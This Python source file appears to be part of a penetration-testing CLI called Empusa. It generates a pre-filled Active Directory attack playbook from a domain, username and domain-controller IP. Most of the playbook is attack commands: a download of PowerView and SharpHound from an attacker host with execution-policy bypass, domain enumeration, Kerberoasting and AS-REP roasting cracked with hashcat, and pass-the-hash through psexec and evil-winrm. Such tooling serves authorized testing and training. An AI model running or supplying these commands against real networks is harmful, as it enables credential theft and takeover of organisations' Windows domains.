"""Empusa - Active Directory enumeration playbook generator."""

from __future__ import annotations

from datetime import datetime
from pathlib import Path

from rich.prompt import Confirm, Prompt

from empusa.cli_common import (
    CONFIG,
    console,
    log_error,
    log_success,
    render_screen,
)


def ad_enum_playbook() -> None:
    """Generate pre-filled Active Directory enumeration commands."""
    render_screen("AD Enumeration Playbook", "Generates ready-to-paste AD enumeration commands.")

    domain = Prompt.ask("Domain name (e.g., corp.com)").strip()
    if not domain:
        log_error("Domain name required.")
        return

    username = Prompt.ask("Domain username (e.g., stephanie)").strip()
    dc_ip = Prompt.ask("Domain Controller IP (if known, or leave blank)").strip()

    # Derive distinguished name
    dn = ",".join(f"DC={part}" for part in domain.split("."))

    sections: list[str] = []
    sections.append("# === Active Directory Enumeration Playbook ===")
    sections.append(f"# Domain: {domain}  |  User: {username}  |  DC: {dc_ip or 'auto'}")
    sections.append(f"# Generated by Empusa - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    sections.append("")

    # -- RDP / Initial Access
    sections.append("# -- Initial Access ---------------------------------")
    if dc_ip:
        sections.append(f"xfreerdp /u:{username} /d:{domain} /v:{dc_ip}")
    sections.append("")

    # -- net.exe
    sections.append("# -- net.exe Enumeration ----------------------------")
    sections.append("net user /domain")
    sections.append("net group /domain")
    sections.append('net group "Domain Admins" /domain')
    sections.append('net group "Domain Controllers" /domain')
    sections.append('net group "Domain Computers" /domain')
    sections.append(f"net user {username} /domain")
    sections.append("")

    # -- PowerView
    sections.append("# -- PowerView --------------------------------------")
    sections.append("# Transfer: iwr -uri http://<ATTACKER>/PowerView.ps1 -OutFile PowerView.ps1")
    sections.append("powershell -ep bypass")
    sections.append("Import-Module .\\PowerView.ps1")
    sections.append("")
    sections.append("Get-NetDomain")
    sections.append("Get-NetUser | select cn,pwdlastset,lastlogon")
    sections.append("Get-NetUser | select cn,memberof")
    sections.append("Get-NetGroup | select cn")
    sections.append('Get-NetGroup "Domain Admins" | select member')
    sections.append("Get-NetComputer | select cn,operatingsystem")
    sections.append("Get-NetComputer | select cn,operatingsystem,dnshostname")
    sections.append("Find-LocalAdminAccess")
    sections.append("Get-NetSession -ComputerName dc01 -Verbose")
    sections.append("Get-DomainUser -SPN | select samaccountname,serviceprincipalname")
    sections.append(
        "Get-ObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteOwner|WriteDACL'}"
    )
    sections.append("")

    # -- LDAP Script
    sections.append("# -- LDAP PowerShell Script -------------------------")
    sections.append("$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name")
    sections.append(f'$DN  = "{dn}"')
    sections.append('$LDAP = "LDAP://$PDC/$DN"')
    sections.append("")
    sections.append("$dirEntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)")
    sections.append("$searcher = New-Object System.DirectoryServices.DirectorySearcher($dirEntry)")
    sections.append("")
    sections.append("# All domain users")
    sections.append('$searcher.Filter = "(&(objectCategory=person)(objectClass=user))"')
    sections.append("$searcher.FindAll() | ForEach-Object { $_.Properties['samaccountname'] }")
    sections.append("")
    sections.append("# All domain groups")
    sections.append('$searcher.Filter = "(objectCategory=group)"')
    sections.append("$searcher.FindAll() | ForEach-Object { $_.Properties['cn'] }")
    sections.append("")
    sections.append("# Domain Admins members (catches nested groups)")
    sections.append('$searcher.Filter = "(&(objectCategory=group)(cn=Domain Admins))"')
    sections.append("$searcher.FindAll() | ForEach-Object { $_.Properties['member'] }")
    sections.append("")

    # -- SharpHound + BloodHound
    sections.append("# -- SharpHound / BloodHound ----------------------")
    sections.append("# Transfer: iwr -uri http://<ATTACKER>/Sharphound.ps1 -OutFile Sharphound.ps1")
    sections.append("Import-Module .\\Sharphound.ps1")
    sections.append(
        "Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\\Users\\"
        + username
        + '\\Desktop\\ -OutputPrefix "audit"'
    )
    sections.append("")
    sections.append("# On Kali:")
    sections.append("sudo neo4j start")
    sections.append("# Browse: http://localhost:7474  (neo4j / neo4j)")
    sections.append("bloodhound")
    sections.append("# Drag & drop the ZIP -> 'Find Shortest Paths to Domain Admins'")
    sections.append("")

    # -- Kali Remote Tools
    sections.append("# -- Remote Enumeration (from Kali) ---------------")
    if dc_ip:
        sections.append(f"nxc smb {dc_ip} -u '{username}' -p '<password>' --users")
        sections.append(f"nxc smb {dc_ip} -u '{username}' -p '<password>' --groups")
        sections.append(f"nxc smb {dc_ip} -u '{username}' -p '<password>' --shares")
        sections.append(f"nxc smb {dc_ip} -u '{username}' -p '<password>' --pass-pol")
        sections.append(f"nxc ldap {dc_ip} -u '{username}' -p '<password>' --kdcHost {dc_ip} --asreproast asrep.txt")
        sections.append(f"nxc ldap {dc_ip} -u '{username}' -p '<password>' --kdcHost {dc_ip} --kerberoast kerb.txt")
        sections.append(f"impacket-GetUserSPNs {domain}/{username}:<password> -dc-ip {dc_ip}")
        sections.append(f"impacket-GetNPUsers {domain}/ -dc-ip {dc_ip} -usersfile users.txt")
        sections.append(f"evil-winrm -i {dc_ip} -u {username} -p '<password>'")
        sections.append(f"impacket-psexec {domain}/{username}:'<password>'@{dc_ip}")
    else:
        sections.append("# Fill in DC_IP first, then:")
        sections.append(f"nxc smb <DC_IP> -u '{username}' -p '<password>' --users")
        sections.append(f"nxc smb <DC_IP> -u '{username}' -p '<password>' --shares")
        sections.append(f"impacket-GetUserSPNs {domain}/{username}:<password> -dc-ip <DC_IP>")
    sections.append("")

    # -- Attacks
    sections.append("# -- Common AD Attacks -----------------------------")
    sections.append("# Kerberoasting:")
    if dc_ip:
        sections.append(
            f"impacket-GetUserSPNs {domain}/{username}:<password> -dc-ip {dc_ip} -request -outputfile kerb_hashes.txt"
        )
    sections.append("hashcat -m 13100 kerb_hashes.txt /usr/share/wordlists/rockyou.txt --force")
    sections.append("")
    sections.append("# AS-REP Roasting:")
    if dc_ip:
        sections.append(
            f"impacket-GetNPUsers {domain}/ -dc-ip {dc_ip} -usersfile users.txt -outputfile asrep_hashes.txt"
        )
    sections.append("hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt --force")
    sections.append("")
    sections.append("# Pass-the-Hash:")
    if dc_ip:
        sections.append(f"impacket-psexec -hashes 00000000000000000000000000000000:<NTLM> Administrator@{dc_ip}")
        sections.append(f"evil-winrm -i {dc_ip} -u Administrator -H '<NTLM>'")
    sections.append("")

    full_output = "\n".join(sections)

    # Print to screen
    console.print("")
    for line in sections:
        if line.startswith("# ===") or line.startswith("# -- "):
            console.print(line, style="bold blue")
        elif line.startswith("#"):
            console.print(line, style="dim")
        else:
            console.print(line, style="green")

    # Offer to save
    if Confirm.ask("\nSave playbook to file?", default=True):
        env = CONFIG.get("session_env", "")
        default_name = f"ad_playbook_{domain.replace('.', '_')}.sh"
        out_path = Path(env) / default_name if env else Path(default_name)
        out_path.parent.mkdir(parents=True, exist_ok=True)
        out_path.write_text(full_output + "\n", encoding="utf-8")
        log_success(f"[+] Saved: {out_path}")
